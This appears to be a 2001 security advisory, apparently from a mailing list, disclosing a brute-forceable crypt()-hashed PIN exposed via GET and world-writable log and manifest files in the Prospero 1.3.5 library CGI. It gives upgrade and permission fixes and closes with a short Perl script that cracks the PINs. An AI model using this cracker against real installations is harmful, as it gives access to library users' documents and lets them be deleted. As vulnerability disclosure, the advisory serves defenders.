_=_ Warped Force Advisory _=_

Author: darkyoda <darky0dahushmail.com>
Subject: Multiple vulnerabilities in Prospero 1.3.5 CGI
Discovered: 12.15.00
Announced: 2.1.01
Vendor Status: Maintainer notified 12.27.00. New version released.
                        Current version is 1.3.7
Platforms: Any web server capable of running CGI scripts; this
                        includes UNIX and Windows platforms (Apache, IIS, etc.)
Product Homepage : http://bones.med.ohio-state.edu/prospero/

Blurb: "Prospero is a Web-based document delivery system designed as
                        a complement to the Ariel ® software system. Ariel is a
product of the
                        Research Libraries Group (RLG) which allows libraries to
use the
                        Internet to exchange documents through interlibrary loan."

Problem: Client-side Prospero generates a random 3 or 4 digit PIN that
                users enter into a web-based form that grants them access to
                documents requested through interlibrary loan. Because the form
                uses the GET method, the encrypted PIN is visible in the
                browser. A perusal of login.pl reveals that the Perl crypt() method
                is used to encrypt the PIN. It is trivial for an attacker to
                determine the PIN by brute-force methods; this would allow access to
                user documents, allowing malicious users to delete them arbitrarily
                or to determine the subject of a user's research.

                In addition, login.pl uses 0666 permissions on log and manifest
                files. The manifest file is the user database containing PINs and
                usernames. Non-prospero users can modify/delete entries in
                 this file as they please.

Solution: Upgrade to the latest version 1.3.7.
                Note that I have not reviewed the source of this latest version.
                Clients who cannot upgrade should change the file permissions in
                login.pl to 0660 and consider using complex alphanumeric PINs
                in lieu of the ones generated by Prospero. Note that this will
                only slow an attacker, as the hash could still be brute-forced
                by an industrial password cracker, ala John the Ripper.

Shouts: Gyves, sysdaemon, 2600 (I forgive you for not publishing my
                article), others. Eric Schnell (maintainer) for having
                a good attitude.

Exploit:

#!/usr/bin/perl
#
# crack for prospero PINs
# dY 12.15.00
#
printf("Enter encrypted PIN: ");
chop($passwd = <STDIN>);

$salt = substr($passwd,0,2);
$epin = substr($passwd,2,99);

$lowval = 0;
$highval = 9999;

for ($i = $lowval; $i <= $highval; $i++) {
        if (crypt($i, $salt) eq $passwd) {
                print("***Unencrypted PIN is: $i\n");
                exit(0);
                }
        }
printf("Sorry, couldn't crack it. Try something > $highval.\n");
exit(0);

IMPORTANT NOTICE: If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages.
Get your FREE, totally secure email address at http://www.hushmail.com.

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]